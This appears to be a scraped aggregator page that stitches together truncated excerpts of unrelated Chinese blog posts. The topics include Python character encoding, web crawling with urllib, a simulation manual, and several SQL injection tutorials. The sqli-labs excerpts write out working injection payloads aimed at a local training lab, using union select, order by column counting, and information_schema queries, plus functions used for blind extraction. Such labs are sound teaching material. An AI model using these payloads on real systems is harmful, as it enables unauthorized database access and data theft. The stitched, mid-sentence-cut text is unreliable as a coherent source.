ascii文件

sqli labs注入记录(Less-1至Less-10)

南笙酒味 提交于 2019-11-28 11:27:55
Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1--+ http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1,2,3--+ http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1,2,3,4--+ 此时报错,说明字段数是 3。 确定显位数字: http://127.0.0.1/sqli_labs/Less-1/?id=-1' union select 1,2,3--+ 从上图可以看到,第2和第3个字段均可回显。 进一步地,获取当前数据库名称: http://127.0.0.1/sqli_labs/Less-1/?id=-1' union select 1,(select database()) ,3--+ 数据库名为security。

49-字符编码

我的未来我决定 提交于 2019-11-27 21:59:30
目录 字符编码 一.就算计基础 二.文本编辑器存取文件的原理 三.Python解释器执行py文件的原理 四.Python解释器与文件编辑器的异同 五.字符编码介绍 5.1什么是字符编码 5.2 涉及到字符编码的两个场景 5.3 字符编码发展史与分类 5.4 内存为什么不用UTF-8呢? 5.5 字符编码之文本编辑器操作 5.6乱码分析 六.总结 字符编码 一.就算计基础 二.文本编辑器存取文件的原理 打开编辑器就启动了一个进程,是在内存中的,所以,用编辑器编写的内容,也都是存放在内存中的,断电后数据丢失。 要想永久保存,需要点击保存按钮:编辑器吧内存的数据刷到硬盘上。 在我们编写的一个py文件,没有执行前,和编写其它文件没有任何区别,都只是在编写一堆字符而已。 三.Python解释器执行py文件的原理 第一阶段:Python解释器启动,此时相当于启动了一个文本编辑器 第二阶段:Python解释器相当于文本编辑器,去打开test.py文件,从硬盘上将test.py的文件内容读取到内存中。 第三阶段:Python解释器会解释执行刚刚加载到内存中的test.py的代码(ps:在该阶段,即真正执行代码时,才会识别Python的语法,执行文件内代码,当执行到name='lwx'时,才会开辟内存空间去存放字符串'lwx') 四.Python解释器与文件编辑器的异同 相同点

SQLi_Labs通关文档

六眼飞鱼酱① 提交于 2019-11-27 21:02:31
SQLi_Labs通关文档 先列举一下sql基础语句 show databases; //查看数据库use xxx; //使用某个数据库show tables; //查看该数据库的数据表desc xxx; //查看该数据表的结构select * from xxx; //查找某个数据表的所有内容select schema_name from information_schema.schemata; //猜数据库select table_name from information_schema.tables where table_schema='xxxxx'; //猜某数据库的数据表Select column_name from information_schema.columns where table_name='xxxxx'; //猜某表的所有列left(a,b) //从左侧截取 a 的前 b 位mid(column_name,start[,length]) //从位置start开始,截取column_name字符串的length位,与substr作用相同substr(string, start, length) //从位置start开始,截取字符串string的length长度,与mid作用相同ascii() //将某个字符转换成ascii码ord() /

SQL Injection(Blind)

為{幸葍}努か 提交于 2019-11-27 16:27:01
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 0x01分类 Booleanbase(基于布尔) 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 Timebase(基于时间) 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确 0x02常用函数 1234567 substr() substr(string string,num start,num length);string为字符串;start为起始位置;length为长度。count() 计数函数 count()函数是用来统计表中记录的一个函数,返回匹配条件的行数select count(*) from mysql.user where id =1ascii()返回对应字符的十进制值length() 返回字符串长度left() left(str, length),即:left(被截取字符串, 截取长度)

python-02.字符编码

*爱你&永不变心* 提交于 2019-11-27 13:31:54
一 了解字符编码的知识储备 一 计算机基础知识 二 文本编辑器存取文件的原理(nodepad++,pycharm,word) #1、打开编辑器就打开了启动了一个进程,是在内存中的,所以,用编辑器编写的内容也都是存放与内存中的,断电后数据丢失 #2、要想永久保存,需要点击保存按钮:编辑器把内存的数据刷到了硬盘上。 #3、在我们编写一个py文件(没有执行),跟编写其他文件没有任何区别,都只是在编写一堆字符而已。 三 python解释器执行py文件的原理 ,例如python test.py #第一阶段:python解释器启动,此时就相当于启动了一个文本编辑器 #第二阶段:python解释器相当于文本编辑器,去打开test.py文件,从硬盘上将test.py的文件内容读入到内存中(小复习:pyhon的解释性,决定了解释器只关心文件内容,不关心文件后缀名) #第三阶段:python解释器解释执行刚刚加载到内存中test.py的代码( ps:在该阶段,即真正执行代码时,才会识别python的语法,执行文件内代码,当执行到name="egon"时,会开辟内存空间存放字符串"egon") 四 总结python解释器与文件本编辑的异同 #1、相同点:python解释器是解释执行文件内容的,因而python解释器具备读py文件的功能,这一点与文本编辑器一样 #2、不同点:文本编辑器将文件内容读入内存后

Gate使用手册(三)-数据输出

别说谁变了你拦得住时间么 提交于 2019-11-27 08:30:54
原文通道 http://wiki.opengatecollaboration.org/index.php/Users_Guide:Data_output Gate中,你必须给定一个名字,不然默认数据输出是关闭的 所有的命令行必须写在initialization之后 /gate/output/... 一ASCII和二进制输出 GateToASCII/GateToBinary类允许ASCII/ binary 文件输出,你可以用自己的工具生成原始数据。另一方面,数据没有被压缩,所以会非常大,这个过程也非常耗时,.bin文件输出hits,singles(??),coincidience /gate/output/ascii(binary)/enable /gate/output/ascii/setFileName test 下面的指令分别输出hits,singles(??),coincidience # enable ascii(binary) output for hits /gate/output/ascii(binary)/setOutFileHitsFlag 1 # enable ascii(binary) output for Singles (end of digitizer chain) /gate/output/ascii(binary)

爬虫基础知识

删除回忆录丶 提交于 2019-11-26 22:42:23
爬虫基础知识 一:urllib库   urllib是Python自带的一个用于爬虫的库,其主要作用就是可以通过代码模拟浏览器发送请求。其常被用到的子模块在Python3中的为urllib.request和urllib.parse,在Python2中是urllib和urllib2。 二:由易到难的爬虫程序:   1.爬取百度首页面所有数据值 1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 #导包 4 import urllib.request 5 import urllib.parse 6 if __name__ == "__main__": 7 #指定爬取的网页url 8 url = 'http://www.baidu.com/' 9 #通过urlopen函数向指定的url发起请求,返回响应对象 10 reponse = urllib.request.urlopen(url=url) 11 #通过调用响应对象中的read函数,返回响应回客户端的数据值(爬取到的数据) 12 data = reponse.read()#返回的数据为byte类型,并非字符串 13 print(data)#打印显示爬取到的数据值。 #补充说明 urlopen函数原型:urllib.request.urlopen(url, data=None,

字符编码ANSI和ASCII区别、Unicode和UTF-8区别

这一生的挚爱 提交于 2019-11-26 16:15:02
一.位: 计算机存储信息的最小单位,称之为位(bit),音译比特,二进制的一个“0”或一个“1”叫一位。 二.字节 字节(Byte)是一种计量单位,表示数据量多少,它是计算机信息技术用于计量存储容量的一种计量单位,8个二进制位组成1个字节。在ASCII码中,一个标准英文字母(不分大小写)占一个字节位置,一个标准汉字占二个字节位置。 三.字符 字符是指计算机中使用的文字和符号,比如“1、2、3、A、B、C、~!·#¥%…*()+”等等。 四.ASCII码 先从最简单的ASCII说起吧,这个大家也熟悉:全名是American Standard Code for Information Interchange, 叫做“美国信息交换标准码”。ASCII码中,一个英文字母(不分大小写)占一个字节的空间,一个中文汉字占两个字节的空间。ASCII码是目前最普及的一种字符编码,它扎根于我们的互联网,操作系统,键盘,打印机,文件字体和打印机等。ASCII表如下: 当然,从这个名字美国信息交换标准码来看,ASCII码只适用于美帝,要是用在美帝之外的国家,就不能满足需求了。 ANSI码 ANSI编码是一种对ASCII码的拓展:ANSI编码用0x00~0x7f (即十进制下的0到127)范围的1 个字节来表示 1 个英文字符,超出一个字节的 0x80~0xFFFF 范围来表示其他语言的其他字符。也就是说

字符编码

北城以北 提交于 2019-11-26 14:21:42
字符编码 一、计算机基础 二、文本编辑器存取文件的原理 打开编辑器就打开了启动一个进程,是在内存中的,所以,用编辑器编写的内容也都是存放在内存中的,断电后数据丢失。 都想要永久保存,需要点击按钮:编辑器吧内存的数据刷到了硬盘上。 在我们编写一个py文件(没有执行),跟编写其他文件没有任何区别,都是在编写一堆字符而已 三、Python解释器执行PY文件的原理 第一阶段:python解释器启动,此时就相当于启动了一个文本编辑器 第二阶段:Python解释器相当于文本编辑器,去打开一个test.py文件,从硬盘上讲test.py的文件内容读入到内存中(小复习:python 的解释性,决定了解释器值关心文件内容,不关心文件后缀名)。 第三阶段:Python解释器解释执行刚刚加载到内存中的test.py的代码(ps:在该阶段,即真正执行代码时,才会识别python的语法,执行文件代码,当执行到 name="egon" 时,会开辟内存空间存放字符串 "egon" )。 四、Pythhon解释器与文本编辑器的异同 相同点:Python解释器是解释执行文件内容的,因而Python解释器具备度py文件的功能,这一点与文本编辑器一样。 不同点:文本编辑器将文件内容读入内存后,可不是为了给你看一眼的python代码写的是什么,二为了执行python代码、会识别python语法。 五、字符编码介绍

Python系列(二)python变量赋值与运算符

懵懂的女人 提交于 2019-11-26 14:10:18
本博文阅读目录: 1、什么是变量? 2、命名规则 3、变量赋值在内存中的原理 4、输入与输出[input raw_input,print] 5、常量 6、常用数据类型[整数,浮点数,布尔值,空值] 7、字符串与字符串格式化[%s,%d,%f,%x ] 8、编码 [ASCII,unicode,UTF-8] 9、注释 [#,’’’] 10、python算术运算符 [+,-,*,/,//,%,**] 11、python比较运算符 [==,!=,<>,>,<,>=,<=] 12、python赋值运算符 [=,+=,-+,*=,/=,%=,**=,//=] 13、python位运算符 [&,|,^,>>,<<] 14、python逻辑运算符 [or,and,not] 15、python成员运算符 [in,not in] 16、python身份运算符 [is,is not] 17、python运算符优先级 正文部分 一、变量赋值 1、什么是变量? 变量就是存储了一个值(就是与变量相关联的信息),代表或引用某个值的一个命名。通常使用“变量=值”的方式给变量赋值。学习过程中有不懂的可以加入我们的学习交流秋秋圈784中间758后面214,与你分享Python企业当下人才需求及怎么从零基础学习Python,和学习什么内容。相关学习视频资料、开发工具都有分享 2、命名规则 变量名只能包括字母